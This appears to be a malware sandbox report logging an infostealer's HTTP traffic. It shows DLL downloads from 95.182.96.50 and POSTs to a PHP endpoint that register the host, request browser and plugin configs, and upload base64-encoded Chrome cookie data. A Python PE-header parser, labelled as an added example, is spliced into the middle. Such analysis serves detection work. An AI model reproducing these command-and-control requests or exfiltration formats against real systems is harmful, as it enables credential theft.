Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
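The 200 OK above answers with Content-Type application/x-msdos-program and a body that starts with MZ, which is what the "Downloads executable code via HTTP" signature keys on. As an added worked example (not part of the Joe Sandbox report), the script below parses that header straight from the Data Raw dump: the 64-byte MZ header, then zero bytes in place of the DOS stub and Rich header (an assumption that costs nothing, since the parser never reads that region), then the bytes from the PE signature through the five section headers. From those bytes it recovers the machine type, the DLL flag, the entry point and its section, the section layout and the security (Authenticode) directory, and it checks that the end of that directory lands exactly on the stated Content-Length of 80880, i.e. the body is a complete 32-bit DLL with a certificate table appended after .reloc.

```python
"""Parse the PE header captured in the HTTP/1.1 200 OK body above.

Added example, not part of the sandbox report. MZ_HEX and PE_HEX are copied
from the report's Data Raw dump; the DOS stub and Rich header between them
are replaced by zero bytes (assumption: the parser never reads them).
CONTENT_LENGTH is the value the response header states."""
import struct

CONTENT_LENGTH = 80880

MZ_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00
40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00
"""
PE_HEX = """
50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21
0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00
00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00
06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00
e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00
00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00
80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00
00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00
00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00
84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00
00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
"""
# e_lfanew in the dump is 0xE8, so the PE bytes must start at offset 0xE8
IMAGE = bytes.fromhex(MZ_HEX) + bytes(0xE8 - 0x40) + bytes.fromhex(PE_HEX)

DIR_SECURITY = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY holds a file offset, not an RVA


def parse_pe(buf: bytes) -> dict:
    """MZ -> e_lfanew -> PE signature -> COFF header -> PE32 optional header -> sections."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", buf, opt)
    if magic != 0x10B:
        raise ValueError(f"PE32 expected, magic=0x{magic:x}")
    (entry,) = struct.unpack_from("<I", buf, opt + 16)
    (image_base,) = struct.unpack_from("<I", buf, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", buf, opt + 68)
    (ndirs,) = struct.unpack_from("<I", buf, opt + 92)
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rsize, rptr, *_, sc = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vaddr": vaddr, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "chars": sc})
    sec_off, sec_size = dirs[DIR_SECURITY]
    raw_end = max(s["raw_ptr"] + s["raw_size"] for s in sections)
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "is_dll": bool(chars & 0x2000), "entry_point": entry, "image_base": image_base,
            "subsystem": subsystem, "dll_characteristics": dll_chars, "sections": sections,
            "security_dir": (sec_off, sec_size), "raw_data_end": raw_end,
            # a certificate table sits after the last section, so it sets the file size
            "expected_file_size": max(raw_end, sec_off + sec_size)}


def section_for_rva(sections: list, rva: int):
    """Name of the section whose virtual range contains rva, or None."""
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + s["vsize"]:
            return s["name"]
    return None


if __name__ == "__main__":
    pe = parse_pe(IMAGE)
    kind = "DLL" if pe["is_dll"] else "EXE"
    print(f'machine=0x{pe["machine"]:x} {kind} sections={[s["name"] for s in pe["sections"]]}')
    print(f'entry=0x{pe["entry_point"]:x} in {section_for_rva(pe["sections"], pe["entry_point"])}')
    off, size = pe["security_dir"]
    print(f'security dir 0x{off:x}+0x{size:x} -> file size 0x{pe["expected_file_size"]:x}, '
          f'Content-Length {CONTENT_LENGTH}')
```

The useful check is the last line of output: the section data ends at 0xFA00 (64000 bytes), the certificate table adds 0x41F0, and the sum is 80880, the Content-Length the server announced, so the sandbox captured the whole file and the trailing 16880 bytes are signature, not code.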
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 31 37 38 38 42 38 39 32 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="hwid"1D1788B892973370857647------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build"mainteam------DAECGCGHCGHCAKECBKJK--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"browsers------JJEGCBGIDHCAKEBGIIDB--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"plugins------ECGDHDHJEBGHJKFIECBG--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIIDHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 2d 2d 0d 0a Data Ascii: ------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="message"fplugins------BKJKEBGDHDAFHJKEGIID--
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFHost: 95.182.96.50Content-Length: 7763Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 45 7a 4d 44 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 6b 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 77 4e 44 6b 35 43 55 35 4a 52 41 6b 31 4d 54 45 39 61 7a 6c 30 56 44 4e 78 4e 31 6c 6d 61 44 46 75 65 46 39 47 55 32 77 77 4e 6b 59 31 56 55 56 66 64 6d 52 68 52 6c 46 79 5a 57 6c 48 53 32 55 78 59 55 52 4f 4f 44 4e 4e 5a 58 5a 6c 52 44 64 51 54 44 46 53 57 6c 68 32 59 54 52 7a 4c 57 35 47 59 7a 6c 33 59 56 46 70 4f 55 78 30 53 32 46 32 64 56 52 
4a 59 6d 45 34 54 56 56 72 62 30 64 31 4e 54 68 46 4f 45 55 34 4d 57 64 33 51 6c 39 55 56 30 6f 30 54 6d 63 74 54 47 5a 44 64 6e 70 6f 5a 57 30 33 63 6b 35 79 61 46 70 52 4d 6d 46 48 64 6b 70 61 4f 57 63 79 56 46 6c 6f 63 58 67 79 56 7a 4a 50 4e 45 55 33 64 55 68 52 65 6c 42 72 4d 33 5a 31 54 48 5a 4e 54 48 68 47 57 46 70 7a 63 55 55 32 54 6d 52 42 56 6d 6c 52 52 45 56 44 52 33 42 76 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; 